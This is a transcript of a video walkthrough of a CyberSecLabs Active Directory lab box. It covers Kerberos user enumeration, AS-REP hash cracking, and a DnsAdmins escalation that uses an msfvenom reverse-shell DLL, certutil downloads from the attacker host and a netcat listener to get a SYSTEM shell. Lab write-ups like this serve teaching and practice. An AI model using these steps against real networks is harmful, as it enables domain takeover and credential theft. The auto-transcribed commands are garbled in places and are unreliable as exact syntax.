So here we are and welcome back. In today's video, the machine is also Active Directory and the name is Brute. The last Active Directory machine is Dictionary and Spray, and we are off Cyberseclabs. So 1, 2, 3. I think the two with this done today, Dictionary and Spray, and then we will be off. So let's get started. So here the Nmap scan is ready to be examined, and we have here the ports. As you can see, the domain details like the name, the DNS name, the computer name, and the NetBIOS name. So yeah, all the details very clear. Yeah, so that was about the Nmap scan. Okay, now the enumeration phase will start at enumerating either Kerberos or LDAP. So basically we have LDAP here, and we have Kerberos. We're going to use Kerberos as usual to enumerate for the usernames, the valid usernames, and if any of these usernames has the peer authentication disabled. For the LDAP, we're going to use LDAP to enumerate for the valid users to see if there are any plain text sensitive details in there. So you're going to start off with sudo nmap-p, and we specify the port, which is 389. So 389 script LDAP and not root. And the IP of the host 132.31.33. We forgot to specify the switch -sv. And let's see what this will return for us. Okay, so let's examine the results. So here are the root details, not interested in these, the schema details, and we haven't got anything to do with users. So we need to use something else to enumerate for the users. That is where we're going to use some of the Nmap scripts to enumerate the valid Kerberos users. So what we can do here, we can just enter here and to sudo nmap-p. I'm going to specify 88 because because we are interacting with Kerberos --script krb5 enum users, right? --script. I'm here specify the arguments. Here we need to put krb5 enum users dot. Here we need to put the real, which is the name of the DNS name, right? So real equal root, right? And then we specify the word list, that will be used by the Nmap script krb5 to find the valid users. So user tp. I'm going to use one of the sec list. So user share word list sec lists. It's not autocomplete. Okay. Usernames. Let me find the correct name. Split. cd user share word list. So sec lists. So here we need to put the S lowercase, the L lowercase. Okay, and then usernames. No to complete. Sucks. Okay, so we have usernames. We will use names because it's pretty much common to use the names wordless with Active Directory machines. Names. Okay, cd names. And we use names.txt. Okay, and the IP 172.31.3.3. All right, this is fine. That's why we will also. Okay, so we will use here. So we use the nmap scripts. That's fine. We find one user. We know there is administrator in there. So we're gonna switch to Kerberoasting Linux MD64 to find more users. So okay, and here we specify the option user enum, right? Then the name of the domain root.csl -t, and here --dc, the IP 172.31.3.3, and then we specify the word list. Let's copy it from here. Take this one. No such file or directory. User share word lists. User share word lists. Okay, sec lists. User names. Names. All right. Names. Now this is getting very weird. So I am here, and this is the word list. Okay, so what's wrong here? I think we forgot the slash here, right? Okay, so we got the first valid user, Patrick. Malcolm. Another Patrick. So we will leave this running to find all the users, and I will get back to you. Maybe one of the reasons the nmap tended to work. Let me try with nmap again. So down there, here, let's drag this up. Sudo nmap -p 88 script equal krb5 enum users script args krb5 enum users real equal here root user dp no targets were specified. Yep, that's correct. Only one. If I specified here root.csl, same result. No idea. No idea. No idea why the script is not working with nmap, but let's do this. Same script enum users script arguments. We supplied everything. Well, it's wise to use Google for that. Actually, I'm curious why this doesn't work. So I suppose this worked. Just finished? No? Okay. Um, nmap krb5 script enum users. Why it is not working? User summary krb5 enum users.realm usage p88. Well, this is the exact way we use that. This is how we use it, right? Let's compare. This is not helping actually. Let's do this. All right, so sudo nmap p88 --script. Oh, it is the equal, you think? Let's change the equal then. The equal that broke the command? No, I don't think so. Yep, the same. So krb5 enum users script arguments krb5 enum users dot realm equal brute, right? Let's examine the nmap scan above again, or it was somewhere here. Okay, so yes, it's brute. Well, maybe the word list isn't taking effect. User DP, there is an option again here. So here, the user DP option, right? User DP here. Let's go back. User DP. Let's take a live example here, if there is a live example. Nmap p88 domains, and we have here the comma user DP DCIP. I'm going to try for the last time. So here, let's drag this to the left. Oh, it's the space. Seems like it's working now. Okay, so up there we have found Patrick, Malcolm, administrator, Tess. Okay, so while this is running, let's open our lovely mousepad. Open with mousepad. And we note down these users because then, or after that, or afterwards, we will start finding or enumerating for which of these users. What's this? Okay, so now we have Tess, administrator, Malcolm. Please correct me if there is any typo. Patrick, and I think that was it. And now let's use the regular tool get np users to try to find which one of these users has the pre-authentication disabled so we can grab their ticket, granting ticket, and decrypt it. All right, so sudo python 3 get. All right, the arguments that users file. User file is in home, not the same. Root. All right, -dc -ip. and yep, run. Let me check my manual. We search for get and key. Okay, this IP. Oh, we forgot something here. So let's clear. I don't like the errors. So here we have the CIP, as you can see here, and the DNS name user file, and lastly comes user file. So here, what we're going to do, we're going to remove all of this. Dash DC dash IP 172.31, right? Let's make sure the IP is correct. So 31.3.3. And then we need the domain name or DNS name root.csl slash okay users dash users. Just a second. No, that user file and user list. So here everything is correct, I guess. Yep. Start. Okay. Now we have the ticket to granting ticket for the user tests. So what we have to do now, we need to grab this, copy that, and see the out of this, sudo nano hashes, paste this, save, get out, and then we spawn John dash dash word list equal user share word list rock u. So that I get very clumsy with the keyboard and the hashes. Let's find the password. So the password for the user test is unique1. Now, I don't think I need to put this in a file. It's going to be the only password we use in the channel. So now let's make sure that the user test can use WinRM. So here we use sudo crack map exec WinRM, the IP -u -p, the password. What is that? Incompatible, binary incompatible. But that's very strange. I'm getting this error anyway. Is this running? Oh, it couldn't execute. Okay. Let's try again. Let's try then right away, right off the bat to WinRM. Sudo eval WinRM -i -u -p and try it. Okay. All right, so we get the first unprivileged shell on the system, which is under the user tests. Now there are many things we can do here, right? Trying to download Mimikatz, enumerate the users, enumerate the groups, trying to add this. Let's try this. Let's try adding the user to the domain admins. Maybe it work. Maybe the user has some right access to the group. So net local group. Now who slash all. So set here are the permissions of the current user, and these are the groups that the user belongs to. So we belong to remote management users. We can log in with RTP, pre-Windows 2000 compatible access, authenticated users, DNS admins. That's interesting. NCLM authentication. All right, let's try to simplify things. If we get Mimikatz and Mimikatz can dump everything for us, then we don't need to run through the hassle of dealing with DNS admins, because I think that there is something in here we can do. So split sudo -m http server. Like always, Mimikatz. Okay, so cert util -url cache -f http 10 10 0 7 Mimikatz. It has been requested. Okay. Will we wait forever? Okay. Now cmd. Oh, not here. So cmd.exe/c mimikatz.exe privilege, and then lsa done, lsa batch exit. What we have here, so here the string is missing the terminator. The terminator. Who is the terminator here? Yes. So here we have one. Okay. So let's remove this. Isn't recognized. Okay. Let's then remove this one. How about this? Okay. So it has run, and we don't got the privilege to run it. So Google, and we type DNS admins exploit. From DNS admins to system to domain compromise. Windows privilege escalation DNS admins to domain admins. Seems like we got many stuff to try. That's why if we type here, or if we go to bricks and we look for DNS admins, We looked in the wrong place here. Go up. Backup operator, rename, execute. Okay, a user who is a member of the DNS admins group or have write privileges to a DNS server object can load an arbitrary DLL with system privileges on the DNS server. This is really interesting, and the domain controllers are used very frequently at the DNS servers. So then if you have a user inside the DNS admins group, you can make the DNS server load an arbitrary DLL with system privileges. You can make the DNS server load a local or remote shared by SMP a DLL file executing. So DNSCMD, computer name config, server level plugin DLL, cpath to DLL. That's what we will try now. So since you are part of DNS admins or tests, right? So tests here is part of DNS admins, and that's why tests can execute they can control the DNS server, right? So they can make the DNS server load a malicious file. In this case, we can load DLL file. So that's why it's a bad idea to have a member in your Active Directory structure having control over a privileged group like DNS admins or any other privileged group, right? Not specifically DNS admins. It's the idea, giving a user more privilege than they need, right? That's the bad idea here. Okay, so now we're going to use this, but first we need a bad DLL, right? A bad DLL could be generated with Metasploit or massive venom. So here we cd out of downloads, cd back to desktop, and sudo msf venom and -p Windows. We can use Meterpreter, or we can use, let's specify the architecture, x64. And now we can specify either Meterpreter or regular shell. So let me type shell reverse TCP. And now we will type lhost equal 10.10.0.7 lport 455-f DLL. And here let's name it something to be more fishy, right? So we type something like DNS DLL dot DLL. All right, so now the payload has been generated. All we have to do now is to run get the payload on the server and restart the DNS DNS service to run our DLL. Okay, so cert util, this time it will be DNS DLL.dll, DNS DLL.dll. Okay, so it is ready here. Let's make sure it is there. DNS DLL.dll. That's what we will use now. Now, before that, go back, set up our listener, nc-lvp 4545. I go back. Now we need to load this and make it part of the service. So you go back to Hacktricks. Where is that? Where is it going? Okay. So here, DNSCMD, computer name, config. Okay, that's how we make the DLL parts of the configuration of the service. So DNSCMD here, DNSCMD, and we will skip this part because we are doing this locally, and we will copy that Then we put the path, which is users, documents, and the name, dns_dll.dll. Registry property server successfully reset. Now let's stop the service and start it again. So here sc this, I hope the users can do that. .exe, and then we type stop DNS. So here stop pending, fine. Now start. And we got to shell. That's good. /user. Oh, /user. Net authority system. Okay. So that was it. I hope that was somewhat informative and enjoyable, and see you in the next video. Cheers.